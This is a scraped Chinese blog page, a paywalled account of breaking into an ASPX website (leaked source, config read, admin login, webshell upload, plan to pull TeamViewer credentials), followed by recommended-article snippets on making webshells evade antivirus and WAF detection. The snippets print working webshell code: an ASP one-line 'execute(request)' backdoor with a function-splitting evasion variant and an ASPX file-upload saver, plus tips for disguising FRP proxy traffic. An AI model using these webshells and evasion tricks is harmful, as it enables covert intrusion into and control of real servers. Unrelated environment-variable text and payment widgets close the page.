shell 免杀aspx_记一次aspx网站渗透

最新推荐文章于 2024-04-09 14:30:04 发布
VIP文章 最新推荐文章于 2024-04-09 14:30:04 发布
阅读量1.5k 收藏 2
点赞数
文章标签: shell 免杀aspx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42128141/article/details/112422538
版权

95397184c82973e8bdc99e5136b5eb7d.gif

通过前期信息搜集获取到目标站的80xx端口

0c8b823e92699f44fc8087c1aa414f16.png

发现一处源码泄露
查看配置文件

36492b43a1898efcc679b660e62611fa.png

登录manage.aspx

5fbe1749af39b1cc85a978974f158449.png

上传shell
发现安装了TeamViewer

814d5622e35763e742ced36e34bffd93.png

看下进程如果运行tv的话,可直接读取其远程的账号密码
https

最低0.47元/天 解锁文章
简内特
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
无限免杀D盾脚本之aspx ——yzddMr6
yzddMr6的博客
11-19 3436
前言 自己曾经写过一篇文章:利用随机异或无限免杀某盾 php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章. 因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的免杀 0x01 主要方法 字符串拼接 函数 数组 Base64编码 0x02 了解aspx一句话 Aspx的一句话一般是使用Jscript语言实...
免杀对抗&Go魔改二开&Fscan扫描&FRP代理
最新发布
qq_45087791的博客
04-09 1060
渗透测试过程中,有后渗透需求时,需要进行反向代理,最早接触的是frp工具,但是在使用过程当中会有配置文件落地,如果忘删除的情况下容易被溯源C2地址。官方版本的frp在默认配置传输过程中有一些明显的特征,在如今多种安全设备防护的内网会遭受到识别和拦截,如果不进行去除特征或者进行加密传输的话很可能会被设备拦截掉。在落地使用过程中流量及文件不修改的情况下基本被检测查杀,针对这种情况,我们要进行了一些基本的参数测试和特征去除外加功能拓展。=>>直接编译(匹配hash值)=>>功能添加扫描项。
shell 免杀aspx_发个免杀修改的aspx提权马qingshell.aspx
weixin_35795675的博客
01-30 569
protected void Page_load(object sender,EventArgs e){string ok = Request.QueryString["sb"];string shell= Request.QueryString["shell"];//www.moonsec.com moonResponse.Write(shell + ok );Response.Write(""...
shell 免杀aspx_Webshell免杀
weixin_39656513的博客
12-31 547
一句话木马在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。最常见的php一句话木马这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。本着这个原则,尝试改写一句话木马绕过WAF。搜集了几个常用的php函数执行代码的eval、assert、preg_replace接收数据的$_POST、$_GET、$...
webshell免杀小工具
wo41ge的博客
12-25 521
ASP绕过 相比于php ,asp就很不灵活了,许多编码函数不自带,注释无法隔断函数关键字与括号。 但是依然有不少方法可以绕过 首先asp的一句话木马如下: <%execute(request("x"))%> 使用函数分割关键字 <% Function b(): b = request("x") End Function Function a(): eXecUTe(b()) End Function a() %> 连接密码:x 批量脚本 import r
ASPX一句话shell客户端+ASPXshell MS08-067插件
12-28
ASPX一句话shell客户端+ASPXshell MS08-067插件
shell 免杀aspx_对于asp免杀webshell的一些总结
weixin_31235909的博客
12-31 596
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
ASPX史上最全一句话集合
2301_80115097的博客
10-18 588
/可执行命令一句话。
shell 免杀aspx_绕过WebShell检测的总结之文件免杀
weixin_31124869的博客
12-31 503
WAF会维护一个规则库录webshell常用的函数、方法、结构,当匹配上对应特征时便发出警告、直接封禁或隔离。但是安全厂商们为了提升用户体验,一般会以可用性为首要目标,其次才是安全性,这是一个硬伤也是绕过的基础由于正常业务功能的需要,WAF通常并不会全盘枪毙语言中可以执行代码的结构或函数(比如eval),而是判断敏感函数是否处于某种木马后门常用且业务功能不常用的结构中,绕过即是找出既能达到目的又...
ASPX 1句话SHELL
收集盒 Book box
11-09 586
ISTO的版本     ASPX One Code     " enctype="multipart/form-data"> filename:          c# if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])  ); }
第六十六课:借助aspx对payload进行分离免杀1
08-03
靶机背景:msf exploit(multi/handler) > set lhost 192.168.1.5msf exploit(multi/handler
2016最新aspx免杀webshell过安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
ASPX一句话shell客户端
06-16
ASPX一句话shell客户端+ASPXshell MS08-067插件.rar
ASP大马网站渗透测试
01-15
 第一项显示:服务器iis版本、服务器超时时间、以及session信息、服务器CPU数量、主机名、默认管理员信息、Terminal Service终端端口(需要wscript.shell组件支持)支持脚本探测(aspx,php,pl)功能,支持bing查询...
渗透测试攻防webshell大合集.zip
07-26
超千个实战webshell: 138shell antSword antSword-shells AntSwordProject asp aspx b4tm4n-toolz Backdoor Dev Shells webshellpub等等,太多了,不一一列举了,需要的下载使用。
天蝎1_天蝎webshell_webshell管理_
10-01
webshell管理工具天蝎,是由冰蝎变种,可以绕过各种检测设备。
As-Exploits:中国蚁剑后渗透框架
04-06
中国蚁剑后渗透框架 详细介绍:http: 支持类型:php / jsp / aspx 有效载荷部分很多很多了了跟的实现,向其开发者们表示感谢! 支持列表 模块名称\ Shell类型 PHP ASPX JSP 基本信息 √ √ √ 反弹壳 √ √ ...
天眼WEB安全渗透v1.0(压缩包).rar
08-18
渗透、邮件伪造、社工库查询、远程桌面、网页抓包、网络连接、SHELL破解、二级域名爆破.各类脚本程序等功能... 注意:本工具 具有一定的攻击性,所以相关杀毒软件可能会对此误报;本软件集成工具不存在病毒后门...
shell LD_LIBRARY_PATH
01-04
LD_LIBRARY_PATH是一个环境变量,用于指定动态链接库的搜索路径。在Linux下,当程序需要加载动态链接库时,系统会根据LD_LIBRARY_PATH的值来搜索动态链接库的路径。 你可以通过以下方法来设置LD_LIBRARY_PATH环境变量: 1. 在当前shell中临时设置LD_LIBRARY_PATH环境变量: ```shell export LD_LIBRARY_PATH=/path/to/library:$LD_LIBRARY_PATH ``` 这将把`/path/to/library`添加到LD_LIBRARY_PATH环境变量中。 2. 在用户的.bashrc或.bash_profile文件中永久设置LD_LIBRARY_PATH环境变量: 打开终端并输入以下命令: ```shell vi ~/.bashrc ``` 在文件的末尾添加以下行: ```shell export LD_LIBRARY_PATH=/path/to/library:$LD_LIBRARY_PATH ``` 保存并关闭文件。然后运行以下命令使更改生效: ```shell source ~/.bashrc ``` 这将在每次打开新的shell时自动设置LD_LIBRARY_PATH环境变量。 请注意,`/path/to/library`应替换为实际的动态链接库路径。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值